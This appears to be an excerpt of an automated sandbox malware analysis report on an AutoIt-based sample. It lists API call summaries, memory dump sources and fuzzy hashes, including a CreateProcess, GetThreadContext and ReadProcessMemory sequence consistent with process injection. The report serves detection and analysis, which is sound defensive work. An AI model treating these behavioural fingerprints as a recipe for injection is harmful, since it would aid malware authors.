                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                  • _malloc.LIBCMT ref: 0043215D
                                                                                                                  • _malloc.LIBCMT ref: 0043216F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _malloc$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 680241177-0
                                                                                                                  • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                  • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                  • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                                                                                  • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                  • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 0043210A
                                                                                                                    • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                    • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                  • _free.LIBCMT ref: 0043211D
                                                                                                                  • _free.LIBCMT ref: 00432130
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                  • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                                                                  • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                  • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                  • _free.LIBCMT ref: 004295A0
                                                                                                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                  • API String ID: 3938964917-2806939583
                                                                                                                  • Opcode ID: 033f11118d2bf0761c3fbc7c8f9312650caa545343e4c7a31d3d46eda6383293
                                                                                                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                  • Opcode Fuzzy Hash: 033f11118d2bf0761c3fbc7c8f9312650caa545343e4c7a31d3d46eda6383293
                                                                                                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                  Strings
                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcat
                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                  • API String ID: 1765576173-2684727018
                                                                                                                  • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                  • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                  • _strcat.LIBCMT ref: 0040F786
                                                                                                                    • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                    • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3199840319-0
                                                                                                                  • Opcode ID: dd84a9a2c4954cdaa67d8a84c6c9858d316b67fb765be8022c3f98359cffc9f7
                                                                                                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                  • Opcode Fuzzy Hash: dd84a9a2c4954cdaa67d8a84c6c9858d316b67fb765be8022c3f98359cffc9f7
                                                                                                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeInfoLibraryParametersSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3403648963-0
                                                                                                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                  • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2800547568-0
                                                                                                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                  APIs
                                                                                                                  • __lock_file.LIBCMT ref: 00415012
                                                                                                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2999321469-0
                                                                                                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02E41A5B
                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E41AF1
                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E41B13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062920973.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e40000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2438371351-0
                                                                                                                  • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                  • Instruction ID: d56f37dbc418b262e21385ad99045846b29a216a00f1ac5d42043f81bf45e234
                                                                                                                  • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                  • Instruction Fuzzy Hash: 4B12BE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 71a892a5ae77af14274afaf680b49ff36ad1f6cc2d71448e7dc0c11a3e14258c
                                                                                                                  • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                  • Opcode Fuzzy Hash: 71a892a5ae77af14274afaf680b49ff36ad1f6cc2d71448e7dc0c11a3e14258c
                                                                                                                  • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 0eeb9a8a7b3eba7c3b078d7cd264f32f451b67f1c1f74fae57bd44670135af66
                                                                                                                  • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                                  • Opcode Fuzzy Hash: 0eeb9a8a7b3eba7c3b078d7cd264f32f451b67f1c1f74fae57bd44670135af66
                                                                                                                  • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                                                                                  • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                  • Opcode Fuzzy Hash: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                                                                                  • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3031932315-0
                                                                                                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                  APIs
                                                                                                                  • __lock_file.LIBCMT ref: 004142F5
                                                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2597487223-0
                                                                                                                  • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
